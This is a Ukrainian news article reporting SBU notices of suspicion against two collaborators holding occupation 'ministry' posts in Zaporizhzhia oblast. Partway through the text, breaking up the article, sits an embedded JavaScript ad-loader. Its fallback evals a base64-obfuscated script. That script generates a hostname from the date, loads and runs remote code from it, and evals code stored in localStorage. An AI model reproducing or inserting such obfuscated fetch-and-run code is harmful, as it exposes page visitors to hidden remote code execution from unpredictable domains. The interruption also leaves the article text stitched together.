СБУ повідомила про підозру «міністрам» ТОТ Запорізької області

СБУ повідомила про підозру новопризначеним «міністрам» адміністрації країни-агресора на тимчасово окупованих територіях Запоріжжя.

Служба безпеки задокументувала злочинну діяльність двох керівників тимчасово окупованих районів Запорізької області.

За результатами слідчих дій повідомлено про підозру так званим «міністру фінансів» та заступнику «міністра культури, спорту та туризму військово–цивільної адміністрації Запорізької області».
Однією із зловмисників є мешканка Донеччини, яка з 2015 року працювала у так званому «міністерстві фінансів ДНР».

У травні минулого року за вказівкою кремлівських кураторів її призначили начальником «головного управління фінансів, майнових та земельних відносин військово–цивільної адміністрації Запорізької області».

Після створення, на тимчасово окупованих територіях так званих «міністерств», її було підвищено до керівника відомства.
На цих «посадах» вона виконувала завдання кремля щодо переналаштування фінансової системи регіону під стандарти країни-агресора.

Саме за її наказом на тимчасово окупованих територіях Запорізької області організовано введення в обіг російського рубля та заборони гривні.

Ще одним колаборантом є колишній директор спортивної школи Мелітополя, який з початком вторгнення підтримав окупаційну владу та пішов на співпрацю. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

З початку його обуло призначено на посаду директора «департаменту культури, спорту і молоді військово – цивільної адміністрації Запорізької області», а згодом заступником у новоствореному псевдооргані «міністерстві культури, спорту і туризму»

У цьому «кріслі» виконує завдання кремлівського режиму щодо переформатування галузі регіону під стандарти рф.

Він особисто проводив зібрання серед працівників навчальних закладів, зокрема зі спортивними тренерами, під час яких схиляв учасників до співпраці з представниками держави-агресора. Також спілкувався з батьками учнів щодо відновлення роботи секцій, проведення спортивних змагань та організації навчання у спортивних школах за навчальною програмою рф.
Бажаючи проявити себе на новій посаді, та для створення позитивного образу «русского мира», з нагоди дня прапора росії, організував проведення спортивних змагань за участі представників союзу змішаних єдиноборств.

Слідчі СБУ повідомили обом зрадникам про підозру за ч. 5 ст. 111-1 Кримінального кодексу України (добровільне зайняття громадянином України посади, пов’язаної з виконанням організаційно-розпорядчих або адміністративно-господарських функцій, у незаконних органах влади, створених на тимчасово окупованій території, у тому числі в окупаційній адміністрації держави-агресора).

Наразі обидва зловмисники переховуються на тимчасово окупованій території півдня України. Однак, СБУ знає про місця їх перебування і проводить заходи для притягнення до відповідальності. (adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/sbu-povidomila-pro-pidozru-ministram-tot-zaporizkoyi-oblasti/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top